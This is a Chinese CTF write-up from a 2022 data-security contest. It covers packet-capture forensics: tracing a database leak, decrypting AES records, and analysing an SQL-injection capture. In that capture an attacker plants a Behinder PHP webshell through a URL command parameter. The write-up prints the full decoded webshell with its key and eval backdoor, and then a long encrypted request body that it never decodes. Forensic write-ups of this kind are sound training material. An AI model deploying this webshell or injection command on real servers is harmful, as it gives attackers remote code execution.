2022年10月25日，为期两日的数据安全大赛于i春秋平台线上举行，在王队长的领队下，团队三个屁民开始了有趣的解题之旅。

题目分为四个类型，分别是“安全知识”、“数据分析”、“数据算法”、以及数据安全。
时间有点短，再加上有里还有活要干，所以很多题也没有答完，这次由我代表大家给大家进行一个复盘

泄露溯源定位

这个其实是正式答题的第一题，理论题在这里就不赘述了。我们来看下题干和描述。

题干如下：

我们可以得知，此次泄密事件，泄密的主体其实是五个人的姓名、手机号信息，当然了还有其他的一些信息，不过那个是后面的题，我们先看第一题，通过公示的五条信息，而后回放pcap包来找到究竟是哪个账户泄密的。

我们如题，使用wireshark打开数据包就可以了，而后直接筛选mysql协议、检索关键字为 Roberto Qian，至于为什么不检索汉字，因为我嫌转化为十六进制麻烦

实际上符合检索的也没几个，很快我们就检索到了符合要求的数据包

tcp.stream eq 11

我们可以发现，上述的5个电话号码完全符合泄密的信息，那么就可以证明就是这个数据包有问题，并且也可以看到，当前数据库的用户为 dataUser3

第一题也就解答好了，我们接下来看第二题

去github直接搜索关键字就可以找到项目了，很简单，考的是信息收集能力
https://github.com/Tristan-Hao/Green-Berry/blob/f766064e4f9c38bf4aefa06fd3d4abbda7fe4914/catalogue.py

那么我们再看最后一道小题

这里说明，泄露的不仅仅是姓名、手机号，我们直接返回刚刚我们截取的流量包，流量包关键信息如下

def.ob.dcf_customer.dcf_customer.address.address.!.,.........+....1  ..........13345678879...................(....2........13573839493...................#....3.Roberto Qian.15877886543.Beijing*..  .4.Liu Xiao.13098887678......................
.5........18798766766.............."...$......select * from dcf_encryption_info.....B....def.ob.dcf_encryption_info.dcf_encryption_info.id.id.?.
....#B...F....def.ob.dcf_encryption_info.dcf_encryption_info.type.type.!...........D....def.ob.dcf_encryption_info.dcf_encryption_info.key.key.!...........
....1.Base64......2.MD5.
....3.SHA1.go321.....4.AES.aa01...  .5.AES.sin30...
..."..."......select * from dcf_receive_info3.....>....def.ob.dcf_receive_info3.dcf_receive_info3.id.id.?.
....#B...N....def.ob.dcf_receive_info3.dcf_receive_info3
account_id
account_id.?...........B....def.ob.dcf_receive_info3.dcf_receive_info3.info.info.!...........a....1.10021XU2FsdGVkX18ONrEC8DOa5sxdTazAeWPXK8OP/885ZQJWJf6P4RsZUfl8o1VOczurimp/uoUa4NuWVb7f7yTcRw==.....2.10024.U2FsdGVkX18DnWH7nMCG3lVMd8GtLTXeuwEl7xgojnkN2Ovsm0rXzNqLEI0RSnwPYN+/p9BG4ODOr4Iwczj2A3nMwuZkzzTE8z88f/6gGzjhhbdA52JK3f1pivFbnSt+u....3.10022lU2FsdGVkX1+/NGJAqRBlFe+GyjneDvQ8ncbqP+ra5DXk1XGLuGXMbf7TLC5NSScurrJuB2mOxXHJh0yeNiW3vXC+/iKbXQoQhphVQJkUiX0=u....4.11021lU2FsdGVkX18X1/E8qwRNMB9ON1Z+fKLmmkhuVa0EoCRSnppuybeWlcho8XWURJhD0hS1TqBLLH/gAW3lqAGO5BTn9vjUCEQiY7ydcWGPBSs=...  .5.15021.U2FsdGVkX19Gqh30S0qbTTKMw+mXBg2H+FsngqcZNr+KmWQnpVNLDtpPqt5eX7/hFEIbGXxOrJ9VUX3tBJZkR0RYL+TQHV6QHoYvQweOFLRY/PcpP5D2NoqZMLT6hwrzu..
.6.15021lU2FsdGVkX1+bn0csCcNtspL662QhJQI/NEsj8fWWyIBU0GVXvvc/ygymTqH3x8LFcyvPV4YE7OtxkRXOS90Ox49TI/StAcIdnQBletRVA2g=a....7.15021XU2FsdGVkX1+2aHxIB+0HcAPn7x370Dv5RxN2LSlrmkqbNa8bpEfapNqyxWXFWtJvS3d6vfVNpgN6pFzpnDiELA==a....8.11021XU2FsdGVkX18Oj2t+msNrJ7T0sXpcrW0Usy1yqQYRoJF1JQwnD/thdJpPKZ1xTVtrgo8y6LQn5yMMzf6nR6vNiw==a..
.9.15022XU2FsdGVkX1+93npTkiALajdkWz5i4ccX2nV0mRQGfKQUcEOo0YpGBKSm21ayhT0wq7t7vypmpqqLemWjQN5z4Q==b....10.16025XU2FsdGVkX19uDaaDF/0X1yvPtZHqG1jG2Fw0bDQM+jqLoN19RE5MOdiQNVI0k150G+ZB3Ow+8pDvwIw9hdT8wQ==b....11.15028XU2FsdGVkX1/GrEF+qSfy8Fq+w8O0t7ABU1OqzrCoCFo+i42H03T9q2EjSKkSGSPh3gDfBHfamAJwf1OR0WprGw==b....12.15026XU2FsdGVkX19AUOJfLgsTjgV5N/ywPP0vvv52phIYEjxdX70aOG8ek8D55IPDYa7Bz05BmmFE89CVgMDIt1Y7zg==J....13.15771@U2FsdGVkX19V7mz6otuRIdXKP/0pG1DXBl7LwM8Ng28m0Om9wlGsBDUynwm4HhflJ....14.15231@U2FsdGVkX19PJjvCZ4dPBUzWF0A0ZrRQf5C7bYAbC2DUBEggsjIWflpsUkgeFQOKJ....15.15451@U2FsdGVkX18li8mlOIWPfxl331OPPIE64pywNqWvq88P0ZJSU7WMO2ZyDNxxD/onJ....16.15091@U2FsdGVkX19yVfbektz9sPOmf64arS54qTNOQI4qH1A0AGNPMtw1kGaJ2zMx7MDl......."........

我们可以发现，下面有16条加密流量，然后在上半部分有5个编码的提示，我们直接根据提示进行解密，发现其实使用的就是aes加密，秘钥就是aa01

解密后如下
http://www.jsons.cn/aesencrypt/

SQLpacket

第一题，我们可以发现，根据pcap包前面的操作都是sql注入的探测，直到后面进行了命令执行，根据检索，发现攻击者执行了ls命令，并且数据包出现了我们想要的东西

后来发现，可以直接检索关键字
tcp.stream eq 185

第二题，是寻找加密的东西，团队搞半天没找到，后来发现没找到的原因是人家就是base64加密然后转hex了，并没有使用冰蝎aes加密，这就很迷，也是困扰我们团队的一个问题，为什么请求体是aes+base64加密，单单这个返回包却是base64+hex编码？？？

我们通过翻垃圾，找到了冰蝎加密的过程
tcp.stream eq 187

加密主体为base64编码

/tmpbkxya.php?cmd=echo%20PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iMDVjMWNjOWMyZGVhZmI3NSI7CgkkX1NFU1NJT05bJ2snXT0ka2V5OwoJc2Vzc2lvbl93cml0ZV9jbG9zZSgpOwoJJHBvc3Q9ZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7CglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQoJewoJCSR0PSJiYXNlNjRfIi4iZGVjb2RlIjsKCQkkcG9zdD0kdCgkcG9zdC4iIik7CgkJZm9yKCRpPTA7JGk8c3RybGVuKCRwb3N0KTskaSsrKSB7CiAgICAJCQkgJHBvc3RbJGldID0gJHBvc3RbJGldXiRrZXlbJGkrMSYxNV07IAogICAgCQkJfQoJfQoJZWxzZQoJewoJCSRwb3N0PW9wZW5zc2xfZGVjcnlwdCgkcG9zdCwgIkFFUzEyOCIsICRrZXkpOwoJfQogICAgJGFycj1leHBsb2RlKCd8JywkcG9zdCk7CiAgICAkZnVuYz0kYXJyWzBdOwogICAgJHBhcmFtcz0kYXJyWzFdOwoJY2xhc3MgQ3twdWJsaWMgZnVuY3Rpb24gX19pbnZva2UoJHApIHtldmFsKCRwLiIiKTt9fQogICAgQGNhbGxfdXNlcl9mdW5jKG5ldyBDKCksJHBhcmFtcyk7Cj8%2B%20%7Cbase64%20-d%20%3E%20shell.php

解密如下：

<?php
@error_reporting(0);
session_start();
    $key="05c1cc9c2deafb75";
    $_SESSION['k']=$key;
    session_write_close();
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");
        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15];
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

我们在这里获取到了加密的秘钥

$key="05c1cc9c2deafb75";

然后依然是翻垃圾，在某请求中我们发现了下载流量

tcp.stream eq 197

原始请求体：

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